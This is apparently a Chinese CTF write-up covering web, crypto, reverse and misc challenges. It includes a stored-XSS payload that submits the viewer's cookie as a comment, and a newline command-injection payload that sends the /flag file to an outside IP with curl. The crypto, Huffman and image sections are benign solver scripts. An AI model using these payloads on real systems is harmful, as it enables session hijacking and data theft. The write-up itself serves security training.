WEB

Pacman

直接在源码中找通关逻辑,在index.js中就可以找到,但是有两个,之前找错了,一直交没对

image-20250206135129635

拿出来base64+栅栏2栏就行

image-20250206135223548

MysteryMessageBoard

通过弱口令爆破登录shallot用户,密码888888,然后插入xss的payload后访问/admin

<script>
// Stored-XSS snippet used in this challenge: it runs in the browser of whoever renders the comment.
// It re-submits document.cookie as a new comment, which is why the viewer's session later appears on the board.
// This chain needs the comment to be rendered without output encoding and the session cookie to be
// readable from script; HTML-escaping comments, an HttpOnly session cookie, or a restrictive CSP each break it.
var xhr=new XMLHttpRequest();
// NOTE(review): the loopback URL is presumably the board as seen from the admin-side browser — confirm against the challenge setup.
xhr.open("POST", "http://127.0.0.1:8888/", true);
xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
// The cookie string is sent as the "comment" form field, without URL-encoding.
xhr.send("comment=" + document.cookie);
</script>

访问/admin后返回留言板页面,就能在留言里看到session(payload把访问者的cookie当作一条新留言提交了,说明该cookie没有设置HttpOnly)

image-20250207001519805

在本地把session改成拿到的值,访问flag获得flag

image-20250207001649101

HoneyPot

先查看go代码发现是一个sql的接口,且在远程连接输入密码时可以进行rce

image-20250216172946620

题目提示有/writeflag命令且要出网,因此在密码位置构造rce,注意到

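// sanitizeInput removes shell metacharacters and ASCII control characters
// from input and returns what is left.
//
// The original deny-list covered ; & | > < ( ) { } [ ] \ and the backtick but
// not line breaks, and a shell treats a newline as a command separator just
// like ';'. The character class now also drops every control character
// (0x00-0x1f and 0x7f), which includes \n and \r.
//
// NOTE(review): a deny-list is still a brittle defence ('$', quotes and
// spaces pass through). If the caller builds a shell command line from this
// value (the call site is not visible here), pass the value as a separate
// argv element (exec.Command without "sh -c") or via stdin/environment
// instead of relying on this filter.
func sanitizeInput(input string) string {
	reg := regexp.MustCompile(`[;&|><\(\)\{\}\[\]\\` + "`" + `\x00-\x1f\x7f]`)
	return reg.ReplaceAllString(input, "")
}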

过滤了;&等字符,但黑名单里没有换行符,而shell把换行同样当作命令分隔符,因此可以通过换行符(%0a)绕过

password%0a/writeflag%0acurl -d @/flag 47.108.237.7:4002

先连接本地

connected后通过导入数据中的密码进行rce

image-20250216173627817

一段时间后访问/flag获得flag(存疑)

image-20250216180533185

CRYPTO

ezBag

直接通过脚本:把四个背包方程构造成格,用LLL求出p的各个比特,再用sha256(str(p))作为AES-ECB密钥解密

from sage.all import *
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad # 添加缺失的导入

# Data given by the challenge.
# `list` holds four rows of weights (one row per knapsack equation) and `bag`
# holds the four corresponding target sums.
# NOTE: the name `list` shadows the Python builtin for the rest of the script.
list = [[2826962231, 3385780583, 3492076631, 3387360133, 2955228863, 2289302839, 2243420737, 4129435549, 4249730059, 3553886213, 3506411549, 3658342997, 3701237861, 4279828309, 2791229339, 4234587439, 3870221273, 2989000187, 2638446521, 3589355327, 3480013811, 3581260537, 2347978027, 3160283047, 2416622491, 2349924443, 3505689469, 2641360481, 3832581799, 2977968451, 4014818999, 3989322037, 4129732829, 2339590901, 2342044303, 3001936603, 2280479471, 3957883273, 3883572877, 3337404269, 2665725899, 3705443933, 2588458577, 4003429009, 2251498177, 2781146657, 2654566039, 2426941147, 2266273523, 3210546259, 4225393481, 2304357101, 2707182253, 2552285221, 2337482071, 3096745679, 2391352387, 2437693507, 3004289807, 3857153537, 3278380013, 3953239151, 3486836107, 4053147071], [2241199309, 3658417261, 3032816659, 3069112363, 4279647403, 3244237531, 2683855087, 2980525657, 3519354793, 3290544091, 2939387147, 3669562427, 2985644621, 2961261073, 2403815549, 3737348917, 2672190887, 2363609431, 3342906361, 3298900981, 3874372373, 4287595129, 2154181787, 3475235893, 2223142793, 2871366073, 3443274743, 3162062369, 2260958543, 3814269959, 2429223151, 3363270901, 2623150861, 2424081661, 2533866931, 4087230569, 2937330469, 3846105271, 3805499729, 4188683131, 2804029297, 2707569353, 4099160981, 3491097719, 3917272979, 2888646377, 3277908071, 2892072971, 2817846821, 2453222423, 3023690689, 3533440091, 3737441353, 3941979749, 2903000761, 3845768239, 2986446259, 3630291517, 3494430073, 2199813137, 2199875113, 3794307871, 2249222681, 2797072793], [4263404657, 3176466407, 3364259291, 4201329877, 3092993861, 2771210963, 3662055773, 3124386037, 2719229677, 3049601453, 2441740487, 3404893109, 3327463897, 3742132553, 2833749769, 2661740833, 3676735241, 2612560213, 3863890813, 3792138377, 3317100499, 2967600989, 2256580343, 2471417173, 2855972923, 2335151887, 3942865523, 2521523309, 3183574087, 2956241693, 2969535607, 2867142053, 2792698229, 3058509043, 3359416111, 3375802039, 2859136043, 
3453019013, 3817650721, 2357302273, 3522135839, 2997389687, 3344465713, 2223415097, 2327459153, 3383532121, 3960285331, 3287780827, 4227379109, 3679756219, 2501304959, 4184540251, 3918238627, 3253307467, 3543627671, 3975361669, 3910013423, 3283337633, 2796578957, 2724872291, 2876476727, 4095420767, 3011805113, 2620098961], [2844773681, 3852689429, 4187117513, 3608448149, 2782221329, 4100198897, 3705084667, 2753126641, 3477472717, 3202664393, 3422548799, 3078632299, 3685474021, 3707208223, 2626532549, 3444664807, 4207188437, 3422586733, 2573008943, 2992551343, 3465105079, 4260210347, 3108329821, 3488033819, 4092543859, 4184505881, 3742701763, 3957436129, 4275123371, 3307261673, 2871806527, 3307283633, 2813167853, 2319911773, 3454612333, 4199830417, 3309047869, 2506520867, 3260706133, 2969837513, 4056392609, 3819612583, 3520501211, 2949984967, 4234928149, 2690359687, 3052841873, 4196264491, 3493099081, 3774594497, 4283835373, 2753384371, 2215041107, 4054564757, 4074850229, 2936529709, 2399732833, 3078232933, 2922467927, 3832061581, 3871240591, 3526620683, 2304071411, 3679560821]]
bag = [123342809734, 118191282440, 119799979406, 128273451872]
# Ciphertext; the script later decrypts it with AES in ECB mode under sha256(str(p)).
ciphertext = b'\x1d6\xcc}\x07\xfa7G\xbd\x01\xf0P4^Q"\x85\x9f\xac\x98\x8f#\xb2\x12\xf4+\x05`\x80\x1a\xfa !\x9b\xa5\xc7g\xa8b\x89\x93\x1e\xedz\xd2M;\xa2'

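# Parameters.
# `**` instead of `^`: only the Sage preparser reads `^` as a power. Run as a
# plain Python script (as the `from sage.all import *` header suggests), `2^60`
# is XOR and evaluates to 62, which is far too small a scaling factor.
K = 2**60
n = 64  # bit length of p
num_equations = 4  # number of knapsack equations

# Build the lattice basis. The first num_equations columns carry the scaled
# equations; the remaining n columns form an identity block that records which
# weights were selected.
rows = [[-K * target for target in bag] + [0] * n]  # row for the target sums
for j in range(n):
    scaled_weights = [K * lst[j] for lst in list]
    selector = [0] * n
    selector[j] = 1  # unit-vector part for bit j
    rows.append(scaled_weights + selector)

# Convert to an integer matrix.
M = Matrix(ZZ, rows)
print("Matrix constructed. Starting LLL...")

# Run LLL.
L = M.LLL()
print("LLL completed. Searching for solution...")

# Look for a reduced row whose equation part vanishes and whose tail is a
# bit vector.
found = False
p = None
for row in L:
    # The scaled equation columns must all be zero.
    if any(v != 0 for v in row[:num_equations]):
        continue
    x = [int(v) for v in row[num_equations:num_equations + n]]
    # LLL is free to return the short vector with its sign flipped, in which
    # case the bits show up as 0/-1 instead of 0/1.
    if all(v in (0, -1) for v in x):
        x = [-v for v in x]
    elif not all(v in (0, 1) for v in x):
        continue
    # Check the candidate against the original equations so that a 0/1 vector
    # that is not actually a solution is not accepted.
    if any(
        sum(w * bit for w, bit in zip(weights, x)) != target
        for weights, target in zip(list, bag)
    ):
        continue
    # Bit j of p is x[j] (least significant bit first).
    p = sum(bit << i for i, bit in enumerate(x))
    found = True
    break

if not found:
    print("Error: Solution not found. Try adjusting K or check the matrix construction.")
else:
    # Decrypt: the AES key is SHA-256 of the decimal string of p.
    key = hashlib.sha256(str(p).encode()).digest()
    cipher = AES.new(key, AES.MODE_ECB)
    plaintext = cipher.decrypt(ciphertext)
    try:
        flag = unpad(plaintext, 16)
        print("Flag found:", flag.decode())
    except ValueError:
        # Also reached when the unpadded bytes are not valid UTF-8, because
        # UnicodeDecodeError is a subclass of ValueError.
        print("解密成功但填充错误,可能是p错误")
        print("解密后的字节:", plaintext)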

RE

Compress dot new

直接跑脚本:根据给出的json重建哈夫曼树,再对二进制串逐位解码

import json

def rebuild_tree(node):
    """Convert the dict-based Huffman tree into nested two-element lists.

    A node that has an ``'s'`` key is a leaf and yields that symbol value.
    Any other node is read through its ``'a'`` and ``'b'`` children, which
    become index 0 and index 1 of the returned list.
    """
    if 's' not in node:
        zero_branch = rebuild_tree(node['a'])
        one_branch = rebuild_tree(node['b'])
        return [zero_branch, one_branch]
    return node['s']

def decode_huffman(binary_str, tree):
    """Decode a string of bit characters with a nested-list Huffman tree.

    Each character is converted with ``int()``; a value of 0 follows index 0
    of the current node and any other value follows index 1. Reaching an
    ``int`` leaf emits that value and restarts from the root. Bits left over
    after the last complete symbol are dropped. The symbols are returned as
    ``bytes``.
    """
    decoded = []
    node = tree
    for ch in binary_str:
        node = node[0] if int(ch) == 0 else node[1]
        if not isinstance(node, int):
            continue
        decoded.append(node)
        node = tree  # symbol complete: start again at the root
    return bytes(decoded)

# Challenge input: the Huffman tree and the encoded bit string.
# json_input is written as a Python dict literal, so it is never parsed from a JSON string.
# Leaves carry the symbol under 's'; inner nodes carry their children under 'a' and 'b'.
json_input = {"a":{"a":{"a":{"a":{"a":{"s":125},"b":{"a":{"s":119},"b":{"s":123}}},"b":{"a":{"s":104},"b":{"s":105}}},"b":{"a":{"s":101},"b":{"s":103}}},"b":{"a":{"a":{"a":{"s":10},"b":{"s":13}},"b":{"s":32}},"b":{"a":{"s":115},"b":{"s":116}}}},"b":{"a":{"a":{"a":{"a":{"a":{"s":46},"b":{"s":48}},"b":{"a":{"a":{"s":76},"b":{"s":78}},"b":{"a":{"s":83},"b":{"a":{"s":68},"b":{"s":69}}}}},"b":{"a":{"a":{"s":44},"b":{"a":{"s":33},"b":{"s":38}}},"b":{"s":45}}},"b":{"a":{"a":{"s":100},"b":{"a":{"s":98},"b":{"s":99}}},"b":{"a":{"a":{"s":49},"b":{"s":51}},"b":{"s":97}}}},"b":{"a":{"a":{"a":{"s":117},"b":{"s":118}},"b":{"a":{"a":{"s":112},"b":{"s":113}},"b":{"s":114}}},"b":{"a":{"a":{"s":108},"b":{"s":109}},"b":{"a":{"s":110},"b":{"s":111}}}}}}
binary_input = "00010001110111111010010000011100010111000100111000110000100010111001110010011011010101111011101100110100011101101001110111110111011011001110110011110011110110111011101101011001111011001111000111001101111000011001100001011011101100011100101001110010111001111000011000101001010000000100101000100010011111110110010111010101000111101000110110001110101011010011111111001111111011010101100001101110101101111110100100111100100010110101111111111100110001010101101110010011111000110110101101111010000011110100000110110101011000111111000110101001011100000110111100000010010100010001011100011100111001011101011111000101010110101111000001100111100011100101110101111100010110101110000010100000010110001111011100011101111110101010010011101011100100011110010010110111101110111010111110110001111010101110010001011100100101110001011010100001110101000101111010100110001110101011101100011011011000011010000001011000111011111111100010101011100000"

# Rebuild the Huffman tree as nested lists (index 0 = 'a' child, index 1 = 'b' child).
tree = rebuild_tree(json_input)

# Decode the bit string by walking the rebuilt tree one bit at a time.
decoded_message = decode_huffman(binary_input, tree)

# The decoded bytes are printed as UTF-8 text.
print(decoded_message.decode('utf-8'))

MISC

Hakuya Want A Girl Friend

一个十六进制的文件,前面是个压缩包,后面是逆序存放的图片;分离出来并把图片恢复正序后还要修改图片高度,得到压缩包密码To_f1nd_th3_QQ,解压得到flag

image-20250206135547232